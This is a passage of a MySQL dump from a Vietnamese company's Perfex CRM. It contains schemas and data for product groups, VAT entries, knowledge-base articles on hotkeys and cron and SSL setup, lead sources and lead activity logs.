(1965, 'Khóa học 01', '', 0.00, NULL, NULL, 'cái', 5, NULL, '', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, '', NULL, NULL, NULL, 1, NULL, 0, NULL, NULL, NULL, NULL, 'can_be_sold', 'can_be_purchased', 'can_be_manufacturing', 'can_be_inventory', NULL);

-- --------------------------------------------------------

--
-- Table structure for table `tblitems_groups`
--

CREATE TABLE `tblitems_groups` (
  `id` int(11) NOT NULL,
  `name` varchar(50) NOT NULL,
  `commodity_group_code` varchar(100) DEFAULT NULL,
  `order` int(11) DEFAULT NULL,
  `display` int(11) DEFAULT NULL,
  `note` text DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblitems_groups`
--

INSERT INTO `tblitems_groups` (`id`, `name`, `commodity_group_code`, `order`, `display`, `note`) VALUES
(1, 'Quạt trần', 'NH1', 1, 1, '0'),
(2, 'Quạt trần công nghiệp', 'NH2', 2, 1, '0'),
(3, 'Quạt trần cánh lớn', 'NH3', 3, 1, '0'),
(4, 'Quạt công nghiệp', 'NH4', 4, 1, '0'),
(5, 'Phụ kiện', 'NH5', 5, 1, '0');

-- --------------------------------------------------------

--
-- Table structure for table `tblitems_of_vendor`
--

CREATE TABLE `tblitems_of_vendor` (
  `id` int(10) UNSIGNED NOT NULL,
  `vendor_id` int(11) NOT NULL,
  `description` text NOT NULL,
  `long_description` text DEFAULT NULL,
  `rate` decimal(15,2) DEFAULT NULL,
  `tax` int(11) DEFAULT NULL,
  `tax2` int(11) DEFAULT NULL,
  `unit` varchar(40) DEFAULT NULL,
  `group_id` int(11) NOT NULL,
  `commodity_code` varchar(100) NOT NULL,
  `commodity_barcode` text DEFAULT NULL,
  `unit_id` int(11) DEFAULT NULL,
  `sku_code` varchar(200) DEFAULT NULL,
  `sku_name` varchar(200) DEFAULT NULL,
  `sub_group` varchar(200) DEFAULT NULL,
  `active` int(11) DEFAULT NULL,
  `parent` int(11) DEFAULT NULL,
  `attributes` longtext DEFAULT NULL,
  `parent_attributes` longtext DEFAULT NULL,
  `commodity_type` int(11) DEFAULT NULL,
  `origin` varchar(100) DEFAULT NULL,
  `commodity_name` varchar(200) NOT NULL,
  `series_id` text DEFAULT NULL,
  `long_descriptions` longtext DEFAULT NULL,
  `share_status` int(11) DEFAULT 0
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblitem_tax`
--

CREATE TABLE `tblitem_tax` (
  `id` int(11) NOT NULL,
  `itemid` int(11) NOT NULL,
  `rel_id` int(11) NOT NULL,
  `rel_type` varchar(20) NOT NULL,
  `taxrate` decimal(15,2) NOT NULL,
  `taxname` varchar(100) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblitem_tax`
--

INSERT INTO `tblitem_tax` (`id`, `itemid`, `rel_id`, `rel_type`, `taxrate`, `taxname`) VALUES
(3, 19, 3, 'estimate', 10.00, 'Thuế GTGT'),
(4, 20, 3, 'invoice', 10.00, 'Thuế GTGT'),
(5, 41, 10, 'invoice', 10.00, 'Thuế GTGT'),
(8, 60, 17, 'invoice', 10.00, 'Thuế GTGT'),
(9, 61, 17, 'invoice', 10.00, 'Thuế GTGT'),
(12, 79, 27, 'invoice', 10.00, 'Thuế GTGT'),
(13, 95, 34, 'invoice', 10.00, 'Thuế GTGT'),
(17, 126, 15, 'estimate', 10.00, 'Thuế GTGT'),
(20, 131, 47, 'invoice', 10.00, 'Thuế GTGT 10%'),
(21, 132, 48, 'invoice', 10.00, 'Thuế GTGT 10%'),
(22, 160, 21, 'estimate', 10.00, 'Thuế GTGT 10%'),
(24, 162, 21, 'estimate', 10.00, 'Thuế GTGT 10%'),
(25, 163, 57, 'invoice', 10.00, 'Thuế GTGT 10%'),
(26, 164, 57, 'invoice', 10.00, 'Thuế GTGT 10%'),
(30, 168, 58, 'invoice', 10.00, 'Thuế GTGT 10%'),
(32, 181, 61, 'invoice', 10.00, 'Thuế GTGT 10%'),
(33, 182, 27, 'estimate', 10.00, 'Thuế GTGT 10%'),
(34, 189, 29, 'estimate', 10.00, 'Thuế GTGT 10%'),
(36, 192, 66, 'invoice', 10.00, 'Thuế GTGT 10%'),
(37, 197, 31, 'estimate', 10.00, 'Thuế GTGT 10%'),
(38, 198, 32, 'estimate', 10.00, 'Thuế GTGT 10%'),
(39, 202, 34, 'estimate', 8.00, 'Thuế GTGT 8%'),
(40, 209, 36, 'estimate', 10.00, 'Thuế GTGT 10%'),
(41, 210, 73, 'invoice', 10.00, 'Thuế GTGT 10%'),
(42, 212, 74, 'invoice', 10.00, 'Thuế GTGT 10%'),
(43, 214, 38, 'estimate', 10.00, 'Thuế GTGT 10%'),
(44, 215, 76, 'invoice', 10.00, 'Thuế GTGT 10%'),
(45, 228, 41, 'estimate', 10.00, 'Thuế GTGT 10%'),
(46, 254, 49, 'estimate', 8.00, 'Thuế GTGT 8%'),
(47, 262, 92, 'invoice', 10.00, 'Thuế GTGT 10%'),
(48, 263, 92, 'invoice', 10.00, 'Thuế GTGT 10%'),
(50, 298, 61, 'estimate', 10.00, 'Thuế GTGT 10%'),
(52, 320, 74, 'invoice', 10.00, 'Thuế GTGT 10%'),
(53, 347, 122, 'invoice', 10.00, 'Thuế GTGT 10%'),
(54, 348, 122, 'invoice', 10.00, 'Thuế GTGT 10%'),
(57, 334, 117, 'invoice', 10.00, 'Thuế GTGT 10%'),
(59, 387, 84, 'estimate', 10.00, 'Thuế GTGT 10%'),
(60, 388, 139, 'invoice', 10.00, 'Thuế GTGT 10%'),
(61, 389, 140, 'invoice', 10.00, 'Thuế GTGT 10%'),
(62, 390, 140, 'invoice', 10.00, 'Thuế GTGT 10%'),
(63, 391, 140, 'invoice', 10.00, 'Thuế GTGT 10%'),
(64, 392, 141, 'invoice', 10.00, 'Thuế GTGT 10%'),
(65, 393, 141, 'invoice', 10.00, 'Thuế GTGT 10%'),
(66, 394, 142, 'invoice', 10.00, 'Thuế GTGT 10%'),
(67, 395, 142, 'invoice', 10.00, 'Thuế GTGT 10%'),
(68, 396, 142, 'invoice', 10.00, 'Thuế GTGT 10%'),
(69, 397, 143, 'invoice', 10.00, 'Thuế GTGT 10%'),
(70, 398, 143, 'invoice', 10.00, 'Thuế GTGT 10%'),
(71, 399, 144, 'invoice', 10.00, 'Thuế GTGT 10%'),
(72, 400, 144, 'invoice', 10.00, 'Thuế GTGT 10%'),
(73, 401, 145, 'invoice', 10.00, 'Thuế GTGT 10%'),
(74, 402, 145, 'invoice', 10.00, 'Thuế GTGT 10%'),
(75, 403, 146, 'invoice', 10.00, 'Thuế GTGT 10%'),
(76, 404, 146, 'invoice', 10.00, 'Thuế GTGT 10%'),
(77, 405, 147, 'invoice', 10.00, 'Thuế GTGT 10%'),
(78, 406, 148, 'invoice', 10.00, 'Thuế GTGT 10%'),
(79, 407, 148, 'invoice', 10.00, 'Thuế GTGT 10%'),
(80, 408, 149, 'invoice', 10.00, 'Thuế GTGT 10%'),
(81, 409, 150, 'invoice', 10.00, 'Thuế GTGT 10%'),
(82, 410, 151, 'invoice', 10.00, 'Thuế GTGT 10%'),
(84, 412, 152, 'invoice', 10.00, 'Thuế GTGT 10%'),
(85, 413, 153, 'invoice', 10.00, 'Thuế GTGT 10%'),
(86, 414, 154, 'invoice', 10.00, 'Thuế GTGT 10%'),
(87, 434, 166, 'invoice', 10.00, 'Thuế GTGT 10%'),
(90, 507, 101, 'estimate', 10.00, 'Thuế GTGT 10%'),
(91, 508, 101, 'estimate', 8.00, 'Thuế GTGT 8%'),
(92, 509, 182, 'invoice', 10.00, 'Thuế GTGT 10%'),
(93, 510, 182, 'invoice', 8.00, 'Thuế GTGT 8%'),
(97, 571, 118, 'estimate', 10.00, 'Thuế GTGT 10%'),
(99, 573, 203, 'invoice', 10.00, 'Thuế GTGT 10%'),
(101, 575, 119, 'estimate', 10.00, 'Thuế GTGT 10%'),
(102, 576, 119, 'estimate', 10.00, 'Thuế GTGT 10%'),
(103, 577, 119, 'estimate', 8.00, 'Thuế GTGT 8%'),
(104, 585, 122, 'estimate', 8.00, 'Thuế GTGT 8%'),
(105, 586, 207, 'invoice', 8.00, 'Thuế GTGT 8%'),
(115, 75, 25, 'invoice', 10.00, 'Thuế GTGT 10%'),
(116, 76, 25, 'invoice', 10.00, 'Thuế GTGT 10%'),
(131, 689, 233, 'invoice', 10.00, 'Thuế GTGT 10%'),
(137, 714, 143, 'estimate', 8.00, 'Thuế GTGT 8%'),
(142, 719, 143, 'estimate', 8.00, 'Thuế GTGT 8%'),
(143, 720, 143, 'estimate', 10.00, 'Thuế GTGT 10%'),
(144, 721, 143, 'estimate', 8.00, 'Thuế GTGT 8%'),
(146, 784, 158, 'estimate', 10.00, 'Thuế GTGT 10%'),
(147, 786, 251, 'invoice', 10.00, 'Thuế GTGT 10%'),
(148, 776, 157, 'estimate', 10.00, 'Thuế GTGT 10%'),
(149, 777, 157, 'estimate', 10.00, 'Thuế GTGT 10%'),
(150, 782, 157, 'estimate', 10.00, 'Thuế GTGT 10%'),
(151, 787, 157, 'estimate', 10.00, 'Thuế GTGT 10%'),
(152, 791, 254, 'invoice', 10.00, 'Thuế GTGT 10%'),
(153, 792, 254, 'invoice', 10.00, 'Thuế GTGT 10%'),
(155, 823, 261, 'invoice', 10.00, 'Thuế GTGT 10%'),
(156, 824, 261, 'invoice', 10.00, 'Thuế GTGT 10%'),
(158, 921, 195, 'estimate', 10.00, 'Thuế GTGT 10%'),
(159, 922, 195, 'estimate', 10.00, 'Thuế GTGT 10%'),
(160, 923, 287, 'invoice', 10.00, 'Thuế GTGT 10%'),
(161, 924, 287, 'invoice', 10.00, 'Thuế GTGT 10%'),
(162, 927, 289, 'invoice', 10.00, 'Thuế GTGT 10%'),
(164, 933, 198, 'estimate', 10.00, 'Thuế GTGT 10%'),
(168, 975, 208, 'estimate', 10.00, 'Thuế GTGT 10%'),
(169, 976, 302, 'invoice', 10.00, 'Thuế GTGT 10%'),
(171, 1004, 216, 'estimate', 10.00, 'Thuế GTGT 10%'),
(173, 1008, 216, 'estimate', 10.00, 'Thuế GTGT 10%'),
(174, 1009, 310, 'invoice', 10.00, 'Thuế GTGT 10%'),
(175, 1010, 310, 'invoice', 10.00, 'Thuế GTGT 10%'),
(177, 1027, 315, 'invoice', 8.00, 'Thuế GTGT 8%'),
(180, 1030, 317, 'invoice', 8.00, 'Thuế GTGT 8%'),
(181, 1031, 317, 'invoice', 8.00, 'Thuế GTGT 8%'),
(184, 1048, 224, 'estimate', 8.00, 'Thuế GTGT 8%'),
(185, 1049, 224, 'estimate', 8.00, 'Thuế GTGT 8%'),
(186, 1041, 223, 'estimate', 8.00, 'Thuế GTGT 8%'),
(187, 1064, 322, 'invoice', 8.00, 'Thuế GTGT 8%'),
(188, 1068, 226, 'estimate', 8.00, 'Thuế GTGT 8%'),
(189, 1070, 325, 'invoice', 8.00, 'Thuế GTGT 8%'),
(190, 1090, 336, 'invoice', 8.00, 'Thuế GTGT 8%'),
(191, 1104, 344, 'invoice', 8.00, 'Thuế GTGT 8%'),
(192, 1105, 344, 'invoice', 8.00, 'Thuế GTGT 8%'),
(193, 1107, 346, 'invoice', 8.00, 'Thuế GTGT 8%'),
(195, 1121, 232, 'estimate', 8.00, 'Thuế GTGT 8%'),
(199, 1116, 230, 'estimate', 8.00, 'Thuế GTGT 8%'),
(200, 1136, 230, 'estimate', 8.00, 'Thuế GTGT 8%'),
(201, 1137, 350, 'invoice', 8.00, 'Thuế GTGT 8%'),
(202, 1138, 350, 'invoice', 8.00, 'Thuế GTGT 8%'),
(203, 1144, 237, 'estimate', 8.00, 'Thuế GTGT 8%'),
(204, 1146, 354, 'invoice', 8.00, 'Thuế GTGT 8%'),
(205, 1151, 357, 'invoice', 8.00, 'Thuế GTGT 8%'),
(206, 1152, 357, 'invoice', 8.00, 'Thuế GTGT 8%'),
(207, 1153, 239, 'estimate', 8.00, 'Thuế GTGT 8%'),
(208, 1154, 239, 'estimate', 8.00, 'Thuế GTGT 8%'),
(209, 1155, 358, 'invoice', 8.00, 'Thuế GTGT 8%'),
(213, 1172, 243, 'estimate', 8.00, 'Thuế GTGT 8%'),
(216, 1185, 369, 'invoice', 8.00, 'Thuế GTGT 8%'),
(217, 1189, 244, 'estimate', 8.00, 'Thuế GTGT 8%'),
(218, 1190, 244, 'estimate', 10.00, 'Thuế GTGT 10%'),
(220, 1211, 378, 'invoice', 8.00, 'Thuế GTGT 8%'),
(221, 1212, 378, 'invoice', 8.00, 'Thuế GTGT 8%'),
(222, 1223, 385, 'invoice', 8.00, 'Thuế GTGT 8%'),
(223, 1241, 392, 'invoice', 8.00, 'Thuế GTGT 8%'),
(224, 1247, 250, 'estimate', 8.00, 'Thuế GTGT 8%');

-- --------------------------------------------------------

--
-- Table structure for table `tbljob_position`
--

CREATE TABLE `tbljob_position` (
  `position_id` int(10) UNSIGNED NOT NULL,
  `position_name` varchar(200) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tbljob_position`
--

INSERT INTO `tbljob_position` (`position_id`, `position_name`) VALUES
(1, 'Quản lý'),
(2, 'Nhân viên');

-- --------------------------------------------------------

--
-- Table structure for table `tblknowedge_base_article_feedback`
--

CREATE TABLE `tblknowedge_base_article_feedback` (
  `articleanswerid` int(11) NOT NULL,
  `articleid` int(11) NOT NULL,
  `answer` int(11) NOT NULL,
  `ip` varchar(40) NOT NULL,
  `date` datetime NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblknowledge_base`
--

CREATE TABLE `tblknowledge_base` (
  `articleid` int(11) NOT NULL,
  `articlegroup` int(11) NOT NULL,
  `subject` mediumtext NOT NULL,
  `description` text NOT NULL,
  `slug` mediumtext NOT NULL,
  `active` tinyint(4) NOT NULL,
  `datecreated` datetime NOT NULL,
  `article_order` int(11) NOT NULL DEFAULT 0,
  `staff_article` int(11) NOT NULL DEFAULT 0
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblknowledge_base`
--

INSERT INTO `tblknowledge_base` (`articleid`, `articlegroup`, `subject`, `description`, `slug`, `active`, `datecreated`, `article_order`, `staff_article`) VALUES
(2, 3, 'Phím tắt khi dùng CRM', '<h3>Create New&#160;Records<a class=\"anchorlink dashicons-before\" href=\"https://help.perfexcrm.com/hot-keys/#create-new-records\"></a></h3>\n<ul>\n<li><strong>Shift + C &#8211; </strong>Create New Customer</li>\n<li><strong>Shift + I</strong> &#8211; Create New Invoice</li>\n<li><strong>Shift + E</strong> &#8211; Create New Estimate</li>\n<li><strong>Ctrl+Shift+P &#8211;</strong> Create New proposal</li>\n<li><strong>Ctrl+Shift+E</strong> &#8211; Create New Expense</li>\n<li><strong>Shift+L</strong> &#8211; Create New Lead (opens the lead modal)</li>\n<li><strong>Shift+T</strong> &#8211; Create New Task (opens new task modal)</li>\n<li><strong>Shift+P</strong> &#8211; Create New Project</li>\n<li><strong>Shift+S</strong> &#8211; Create New Support Ticket</li>\n<li><strong>Ctrl+Shift+S</strong> &#8211; Create New Staff Member</li>\n</ul>\n<h3>Navigate&#160;To Specific Areas<a class=\"anchorlink dashicons-before\" href=\"https://help.perfexcrm.com/hot-keys/#navigate-to-specific-areas\"></a></h3>\n<ul>\n<li><strong>Alt+D</strong> &#8211; Go To Dashboard</li>\n<li><strong>Alt+C</strong> &#8211; Go To Customers&#160;List</li>\n<li><strong>Alt+T</strong> &#8211; Go To Tasks List</li>\n<li><strong>Alt+I</strong> &#8211; Go To Invoices List</li>\n<li><strong>Alt+E</strong> &#8211; Go To Estimates List</li>\n<li><strong>Alt+P</strong> &#8211; Go To Projects List</li>\n<li><strong>Alt+L</strong> &#8211; Go To Leads List</li>\n<li><strong>Ctrl+Alt+T</strong> &#8211; Go To Tickets List</li>\n<li><strong>Ctrl+Alt+E</strong> &#8211; Go To Expenses&#160;List</li>\n<li><strong>Alt+R</strong> &#8211; Go To Sales Report</li>\n<li><strong>Alt+S</strong> &#8211; Go To Settings</li>\n</ul>\n<h3>Misc<a class=\"anchorlink dashicons-before\" href=\"https://help.perfexcrm.com/hot-keys/#misc\"></a></h3>\n<ul>\n<li><strong>Shift+K</strong> &#8211; Top search bar focus and ready for searching</li>\n<li><strong>Shift+D</strong> &#8211; Tables search focus and ready for searching (matches only first table found in the document)</li>\n<li><strong>Ctrl+Shift+L</strong> &#8211; Logout</li>\n<li><strong>Shift + F</strong> &#8211; Toggle sidebar visibility(v2.7.0)</li>\n</ul>\n<h3>Conditional hotkeys<a class=\"anchorlink dashicons-before\" href=\"https://help.perfexcrm.com/hot-keys/#conditional-hotkeys\"></a></h3>\n<ul>\n<li><strong>Shift+F</strong>\n<ul>\n<li>Mark the current task as finished &#8211; Applicable only when <strong>task modal is opened</strong></li>\n</ul>\n</li>\n<li><strong>Shift+E</strong>\n<ul>\n<li>Edit current task &#8211; Applicable only <strong>when task modal is opened</strong></li>\n<li>Edit lead &#8211; Applicable only when the <strong>lead modal is opened</strong></li>\n</ul>\n</li>\n<li><strong>Shift+C</strong>\n<ul>\n<li>Convert a current lead to a customer &#8211; Applicable only when <strong>the lead modal is opened</strong></li>\n<li>Create new task comment &#8211; Applicable only when the <strong>task modal is opened</strong></li>\n</ul>\n</li>\n</ul>', 'phim-tat-khi-dung-crm', 1, '2022-01-10 20:06:40', 0, 1),
(5, 3, 'Cron SSL', '<p class=\"p1\"><span class=\"s1\"># For example, you can run a backup of all your user accounts</span></p>\n<p class=\"p1\"><span class=\"s1\"># at 5 a.m every week with:</span></p>\n<p class=\"p1\"><span class=\"s1\"># 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/</span></p>\n<p class=\"p1\"><span class=\"s1\"># </span></p>\n<p class=\"p1\"><span class=\"s1\"># For more information see the manual pages of crontab(5) and cron(8)</span></p>\n<p class=\"p1\"><span class=\"s1\"># </span></p>\n<p class=\"p1\"><span class=\"s1\"># m h<span class=\"Apple-converted-space\">&#160; </span>dom mon dow <span class=\"Apple-converted-space\">&#160; </span>command</span></p>\n<p class=\"p2\"><span class=\"s1\">*/15 * * * * curl https://hgphome.com/cron/index </span></p>\n<p class=\"p3\"><span class=\"s1\">* * * * 9-12 * /usr/bin/certbot renew --quiet</span></p>', 'cron-ssl', 0, '2023-02-23 12:30:17', 0, 0);

-- --------------------------------------------------------

--
-- Table structure for table `tblknowledge_base_groups`
--

CREATE TABLE `tblknowledge_base_groups` (
  `groupid` int(11) NOT NULL,
  `name` varchar(191) NOT NULL,
  `group_slug` text DEFAULT NULL,
  `description` mediumtext DEFAULT NULL,
  `active` tinyint(4) NOT NULL,
  `color` varchar(10) DEFAULT '#28B8DA',
  `group_order` int(11) DEFAULT 0
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblknowledge_base_groups`
--

INSERT INTO `tblknowledge_base_groups` (`groupid`, `name`, `group_slug`, `description`, `active`, `color`, `group_order`) VALUES
(1, 'Công nghệ mới', 'cong-nghe-moi', '', 1, '', 1),
(2, 'Giải pháp làm mát', 'giai-phap-lam-mat', '', 1, '', 1),
(3, 'Hướng dẫn CRM', 'huong-dan-crm', '', 1, '', 3),
(4, 'Hướng dẫn nội bộ', 'huong-dan-noi-bo', '', 1, '#ee4c14', 4);

-- --------------------------------------------------------

--
-- Table structure for table `tblleads`
--

CREATE TABLE `tblleads` (
  `id` int(11) NOT NULL,
  `hash` varchar(65) DEFAULT NULL,
  `name` varchar(191) NOT NULL,
  `title` varchar(100) DEFAULT NULL,
  `company` varchar(191) DEFAULT NULL,
  `description` text DEFAULT NULL,
  `country` int(11) NOT NULL DEFAULT 0,
  `zip` varchar(15) DEFAULT NULL,
  `city` varchar(100) DEFAULT NULL,
  `state` varchar(50) DEFAULT NULL,
  `address` varchar(100) DEFAULT NULL,
  `assigned` int(11) NOT NULL DEFAULT 0,
  `dateadded` datetime NOT NULL,
  `from_form_id` int(11) NOT NULL DEFAULT 0,
  `status` int(11) NOT NULL,
  `source` int(11) NOT NULL,
  `lastcontact` datetime DEFAULT NULL,
  `dateassigned` date DEFAULT NULL,
  `last_status_change` datetime DEFAULT NULL,
  `addedfrom` int(11) NOT NULL,
  `email` varchar(100) DEFAULT NULL,
  `website` varchar(150) DEFAULT NULL,
  `leadorder` int(11) DEFAULT 1,
  `phonenumber` varchar(50) DEFAULT NULL,
  `date_converted` datetime DEFAULT NULL,
  `lost` tinyint(1) NOT NULL DEFAULT 0,
  `junk` int(11) NOT NULL DEFAULT 0,
  `last_lead_status` int(11) NOT NULL DEFAULT 0,
  `is_imported_from_email_integration` tinyint(1) NOT NULL DEFAULT 0,
  `email_integration_uid` varchar(30) DEFAULT NULL,
  `is_public` tinyint(1) NOT NULL DEFAULT 0,
  `default_language` varchar(40) DEFAULT NULL,
  `client_id` int(11) NOT NULL DEFAULT 0,
  `lead_value` decimal(15,2) DEFAULT NULL,
  `vat` varchar(50) DEFAULT NULL,
  `from_ma_form_id` int(11) NOT NULL DEFAULT 0,
  `ma_point` int(11) NOT NULL DEFAULT 0
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblleads_email_integration`
--

CREATE TABLE `tblleads_email_integration` (
  `id` int(11) NOT NULL COMMENT 'the ID always must be 1',
  `active` int(11) NOT NULL,
  `email` varchar(100) NOT NULL,
  `imap_server` varchar(100) NOT NULL,
  `password` mediumtext NOT NULL,
  `check_every` int(11) NOT NULL DEFAULT 5,
  `responsible` int(11) NOT NULL,
  `lead_source` int(11) NOT NULL,
  `lead_status` int(11) NOT NULL,
  `encryption` varchar(3) DEFAULT NULL,
  `folder` varchar(100) NOT NULL,
  `last_run` varchar(50) DEFAULT NULL,
  `notify_lead_imported` tinyint(1) NOT NULL DEFAULT 1,
  `notify_lead_contact_more_times` tinyint(1) NOT NULL DEFAULT 1,
  `notify_type` varchar(20) DEFAULT NULL,
  `notify_ids` mediumtext DEFAULT NULL,
  `mark_public` int(11) NOT NULL DEFAULT 0,
  `only_loop_on_unseen_emails` tinyint(1) NOT NULL DEFAULT 1,
  `delete_after_import` int(11) NOT NULL DEFAULT 0,
  `create_task_if_customer` int(11) NOT NULL DEFAULT 0
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblleads_email_integration`
--

INSERT INTO `tblleads_email_integration` (`id`, `active`, `email`, `imap_server`, `password`, `check_every`, `responsible`, `lead_source`, `lead_status`, `encryption`, `folder`, `last_run`, `notify_lead_imported`, `notify_lead_contact_more_times`, `notify_type`, `notify_ids`, `mark_public`, `only_loop_on_unseen_emails`, `delete_after_import`, `create_task_if_customer`) VALUES
(1, 0, '', '', '', 10, 0, 0, 0, 'tls', 'INBOX', '', 1, 1, 'assigned', '', 0, 1, 0, 1);

-- --------------------------------------------------------

--
-- Table structure for table `tblleads_sources`
--

CREATE TABLE `tblleads_sources` (
  `id` int(11) NOT NULL,
  `name` varchar(150) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblleads_sources`
--

INSERT INTO `tblleads_sources` (`id`, `name`) VALUES
(2, 'Facebook'),
(1, 'Google'),
(4, 'Marketing'),
(3, 'Web');

-- --------------------------------------------------------

--
-- Table structure for table `tblleads_status`
--

CREATE TABLE `tblleads_status` (
  `id` int(11) NOT NULL,
  `name` varchar(50) NOT NULL,
  `statusorder` int(11) DEFAULT NULL,
  `color` varchar(10) DEFAULT '#28B8DA',
  `isdefault` int(11) NOT NULL DEFAULT 0
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblleads_status`
--

INSERT INTO `tblleads_status` (`id`, `name`, `statusorder`, `color`, `isdefault`) VALUES
(1, 'Customer', 1000, '#7cb342', 1),
(2, 'KH Tiềm năng', 2, '#28B8DA', 0),
(3, 'Khách hàng Marketing', 3, '#28B8DA', 0);

-- --------------------------------------------------------

--
-- Table structure for table `tbllead_activity_log`
--

CREATE TABLE `tbllead_activity_log` (
  `id` int(11) NOT NULL,
  `leadid` int(11) NOT NULL,
  `description` mediumtext NOT NULL,
  `additional_data` text DEFAULT NULL,
  `date` datetime NOT NULL,
  `staffid` int(11) NOT NULL,
  `full_name` varchar(100) DEFAULT NULL,
  `custom_activity` tinyint(1) NOT NULL DEFAULT 0
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tbllead_activity_log`
--

INSERT INTO `tbllead_activity_log` (`id`, `leadid`, `description`, `additional_data`, `date`, `staffid`, `full_name`, `custom_activity`) VALUES
(15, 8, 'not_lead_imported_from_form', 'a:1:{i:0;s:25:\"Form báo giá quattranvn\";}', '2022-01-21 08:26:07', 0, '[CRON]', 0),
(16, 8, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2022-01-21 08:26:10', 0, '[CRON]', 0),
(21, 11, 'not_lead_imported_from_form', 'a:1:{i:0;s:25:\"Form báo giá quattranvn\";}', '2022-04-29 09:39:22', 0, '[CRON]', 0),
(22, 11, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2022-04-29 09:39:22', 0, '[CRON]', 0),
(23, 11, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:15:\"KH Tiềm năng\";i:2;s:8:\"Customer\";}', '2022-05-04 13:28:05', 1, 'Ho Gia Phat', 0),
(24, 12, 'not_lead_imported_from_form', 'a:1:{i:0;s:35:\"Form báo giá Web Quạt Cao Cấp\";}', '2022-05-06 20:34:56', 0, '[CRON]', 0),
(25, 12, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2022-05-06 20:34:56', 0, '[CRON]', 0),
(26, 13, 'not_lead_imported_from_form', 'a:1:{i:0;s:25:\"Form báo giá quattranvn\";}', '2022-07-28 12:41:23', 0, '[CRON]', 0),
(27, 13, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2022-07-28 12:41:23', 0, '[CRON]', 0),
(30, 15, 'not_lead_imported_from_form', 'a:1:{i:0;s:25:\"Form báo giá quattranvn\";}', '2022-08-16 10:37:36', 0, '[CRON]', 0),
(31, 15, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2022-08-16 10:37:36', 0, '[CRON]', 0),
(32, 16, 'not_lead_imported_from_form', 'a:1:{i:0;s:35:\"Form báo giá Web Quạt Cao Cấp\";}', '2022-09-04 00:09:39', 0, '[CRON]', 0),
(33, 16, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2022-09-04 00:09:39', 0, '[CRON]', 0),
(34, 16, 'not_lead_activity_converted', 'a:1:{i:0;s:11:\"Ho Gia Phat\";}', '2022-09-04 09:47:07', 1, 'Ho Gia Phat', 0),
(35, 16, 'not_lead_activity_contacted', 'a:2:{i:0;s:11:\"Ho Gia Phat\";i:1;s:19:\"04-09-2022 09:49:00\";}', '2022-09-04 09:49:42', 1, 'Ho Gia Phat', 0),
(38, 18, 'not_lead_imported_from_form', 'a:1:{i:0;s:25:\"Form báo giá quattranvn\";}', '2022-09-27 07:33:46', 0, '[CRON]', 0),
(39, 18, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2022-09-27 07:33:46', 0, '[CRON]', 0),
(40, 19, 'not_lead_imported_from_form', 'a:1:{i:0;s:25:\"Form báo giá quattranvn\";}', '2022-10-17 15:08:34', 0, '[CRON]', 0),
(41, 19, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2022-10-17 15:08:34', 0, '[CRON]', 0),
(50, 24, 'not_lead_imported_from_form', 'a:1:{i:0;s:18:\"www.quattranvn.com\";}', '2022-11-22 10:38:03', 0, '[CRON]', 0),
(51, 24, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2022-11-22 10:38:03', 0, '[CRON]', 0),
(52, 25, 'not_lead_imported_from_form', 'a:1:{i:0;s:18:\"www.quattranvn.com\";}', '2023-02-27 11:26:52', 0, '[CRON]', 0),
(53, 25, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-02-27 11:26:52', 0, '[CRON]', 0),
